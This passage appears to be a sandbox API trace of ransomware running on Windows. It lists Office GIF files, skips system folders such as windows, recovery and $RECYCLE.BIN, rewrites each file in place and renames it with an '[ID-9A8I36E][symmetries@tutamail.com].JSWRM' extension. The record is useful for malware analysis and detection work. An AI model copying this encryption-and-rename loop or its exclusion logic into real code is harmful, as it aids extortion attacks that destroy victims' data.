(in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR17F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR17F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0118.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR17F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR17F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR17F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0118.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0118.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0118.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR17F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir17f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11191) returned 1 [0118.714] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0118.714] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x2bb0, lpOverlapped=0x0) returned 1 [0118.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.715] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x2bb0, lpOverlapped=0x0) returned 1 [0118.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.716] CloseHandle (hObject=0x314) returned 1 [0118.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0118.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0118.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0118.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0118.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0118.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0118.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR17F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir17f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR17F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir17f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0118.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0118.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.718] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41f4, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR18F.GIF", cAlternateFileName="")) returned 1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2=".") returned 1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="..") returned 1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="...") returned 1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="windows") returned -1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="recovery") returned -1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="perflogs") returned -1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="documents and settings") returned 1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="system volume information") returned -1 [0118.718] lstrcmpiW (lpString1="PDIR18F.GIF", lpString2="msocache") returned 1 [0118.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0118.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR18F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR18F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR18F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0118.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0118.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR18F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR18F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR18F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0118.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0118.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0118.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0118.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR18F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir18f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.719] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16884) returned 1 [0118.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x41f0) returned 0x24c1d0 [0118.719] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x41f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x41f0, lpOverlapped=0x0) returned 1 [0118.726] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.726] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x41f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x41f0, lpOverlapped=0x0) returned 1 [0118.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.726] CloseHandle (hObject=0x314) returned 1 [0118.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0118.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0118.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0118.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0118.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.727] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR18F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir18f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR18F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir18f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0118.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0118.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0118.727] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4f, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR19F.GIF", cAlternateFileName="")) returned 1 [0118.727] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2=".") returned 1 [0118.727] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="..") returned 1 [0118.727] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="...") returned 1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="windows") returned -1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="recovery") returned -1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="perflogs") returned -1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="documents and settings") returned 1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="system volume information") returned -1 [0118.728] lstrcmpiW (lpString1="PDIR19F.GIF", lpString2="msocache") returned 1 [0118.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0118.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR19F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR19F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR19F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0118.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0118.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR19F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR19F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR19F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0118.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0118.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR19F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir19f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.769] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3151) returned 1 [0118.769] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc40) returned 0x24c1d0 [0118.770] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xc40, lpOverlapped=0x0) returned 1 [0118.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.771] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xc40, lpOverlapped=0x0) returned 1 [0118.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.771] CloseHandle (hObject=0x314) returned 1 [0118.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0118.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0118.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0118.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0118.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0118.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0118.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.772] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR19F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir19f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR19F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir19f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0118.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0118.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.773] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd98, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR1B.GIF", cAlternateFileName="")) returned 1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2=".") returned 1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="..") returned 1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="...") returned 1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="windows") returned -1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="recovery") returned -1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="perflogs") returned -1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="documents and settings") returned 1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="system volume information") returned -1 [0118.773] lstrcmpiW (lpString1="PDIR1B.GIF", lpString2="msocache") returned 1 [0118.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0118.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR1B.GIF", lpUsedDefaultChar=0x0) returned 10 [0118.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0118.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0118.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR1B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR1B.GIF", lpUsedDefaultChar=0x0) returned 10 [0118.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0118.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0118.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, 